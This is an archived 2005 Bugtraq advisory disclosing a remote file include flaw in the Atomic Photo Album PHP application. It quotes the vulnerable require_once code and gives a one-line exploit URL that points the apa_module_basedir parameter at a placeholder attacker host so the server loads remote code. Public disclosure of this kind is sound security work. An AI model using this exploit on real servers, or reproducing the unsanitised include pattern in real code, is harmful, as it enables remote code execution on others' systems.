Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include
From: gr0up.pclabs () gmail com
Date: 23 Jul 2005 21:11:09 -0000

Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :> 
------------------------------------------------------------

Name: Atomic Photo Album (APA)
Version: all


Homepage: http://atomicpa.sourceforge.net/

Author: pc_labs / lwdz - RandomHero 
Date: 20 July 2005
------------------------------------------------------------
------------------------------------------------------------

Vulnerable code in : apa_phpinclude.inc.php

require_once("apa_authadm.inc.php");
  else
    require_once("apa_auth.inc.php");
....else{
require_once("$apa_module_basedir/apa_config.inc.php");
...
 
}
?>

------------------------------------------------------------

Exploit:


http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[h4x0r_b0x]/

--------------------------------------------------------

Fix and Vendor status:

Vendor has been notified.

------------------------------------------------------------

Contact:

Irc: irc.cl#pc_labs
Author: pc_labs
Location: Chile
Email: gr0up.pclabs () gmail com
Greetz: AgReSsOr http://www.tbc-labz.net


  By Date           By Thread  

Current thread:
  • Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include gr0up . pclabs (Jul 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]